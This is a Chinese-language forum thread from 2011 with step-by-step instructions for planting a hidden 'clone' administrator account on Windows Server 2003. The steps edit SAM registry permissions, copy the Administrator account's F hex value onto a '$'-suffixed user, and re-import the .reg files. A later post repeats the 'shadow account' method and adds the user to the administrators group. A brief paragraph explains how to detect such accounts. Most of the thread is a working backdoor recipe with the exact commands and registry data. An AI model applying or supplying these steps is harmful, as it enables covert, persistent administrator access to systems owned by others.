Win2003服务器隐藏用户的添加及解决办法

思考的牛 · 发表于 2011-2-14 16:07:50

先建立 cnlnfjhh$ 用户
c:\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,

把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息

现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$
查看默认键值为"0x3f1" 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为cnlnfjhh$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下

"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00

把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴.
打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
37,f1,02,cf,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

保存后,将cnlnfjhh$用户删除
c:\>net user cnlnfjhh$ /delete
运行regedit.exe 将我们已经修改好的3f1.reg文件导入.
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才添加的帐号

然后注销当前用户用 cnlnfjhh/wrsky 登陆就会是最高权限了.

03克隆的方法和 2000的克隆略有点区别就是我文章的那前一部分.

这样就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户cnlnfjhh$, 记着第一次就把密码设置好,不要改密码

-------------------------------------------------------------------------------

反之。打开[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

users下面的项目跟names下面的项目数量不一致时（比names下面的多），肯定有内鬼。看names项目的键值对应users下面的项目名称，对应不上的，删！！！

我是菜鸟 · 发表于 2011-3-9 21:06:45

牛哥真给力

server_pups · 发表于 2011-3-11 11:50:02

有毫复杂

server_pups · 发表于 2011-3-11 11:50:24

有毫复杂哦。。。

IT民工 · 发表于 2011-3-27 21:46:24

嗯，高手

思考的牛 · 发表于 2011-5-23 10:40:00

影子帐号：

见名思义，帐号具有隐蔽性，不容易被发现（只是在一定程度上）。即一般的菜鸟发现不了。

多余的话我在这里就不说了，进入正题：

首先，我们需要在命令提示符窗口即就是dos下创建一个用户。

需要以下命令：

net user $a 123 /add(这里的$符号是唯一的，可以理解为隐藏的条件，密码为123)

命令执行成功后，可以关闭命令提示符窗口了。

回到桌面，右击我的电脑——管理——本地用户和组（双击）——用户（双击），你会发现我们创建的用户$a。（不要着急，这只是影子帐号的准备阶段）

接着，我们需要在运行窗口下打开注册表，在我以前的文章中曾有注册表的详细介绍介绍。

键入regedit,回车确定。进入注册表：

路径：HKEY_LOCAL_MACHINE\SAM,双击SAM，你会发现打不开SAM。双击SAM时，仍然会发现打不开SAM。右键SAM——权限，Administrators的权限，在完全控制前打上钩，确定。此时我们可以关闭注册表窗口。重新打开并最终实现SAM的目录打开。

从完整的路径来看（在以上基础上）

路径：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names \$a

右键$a——导出，此时命名一个注册表文件.reg,保存。

接着，继续点$a,右边的类型会有一个象“0x3ef”类似的，

看清楚后，在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下000003EF的文件夹。此时右键导出，命名.reg 的文件，保存。

此时去本地用户和组中删掉$a用户。

之后找到刚刚保存的两个.reg的文件，逐个双击。

文件数据会自动注入到注册表中。

此时我们在到本地用户和组去看，并不会看到$a。

惊心时刻，到dos下，键入：net user命令，$a以存在计算机用户中。

影子帐户谜底揭穿。

在此情况下，我们可以给$a提权，

net localgroup administrators $a /add

实现影子帐号的更大作用（注意当进入一个远程系统时，这种情况不可想，要提防这样的黑客）

菜黑3389 · 发表于 2011-5-24 13:05:26

好贴，顶上去

		自动登录	找回密码
密码			注册通行证

Win2003服务器隐藏用户的添加及解决办法

相关帖子

神秘的影子帐号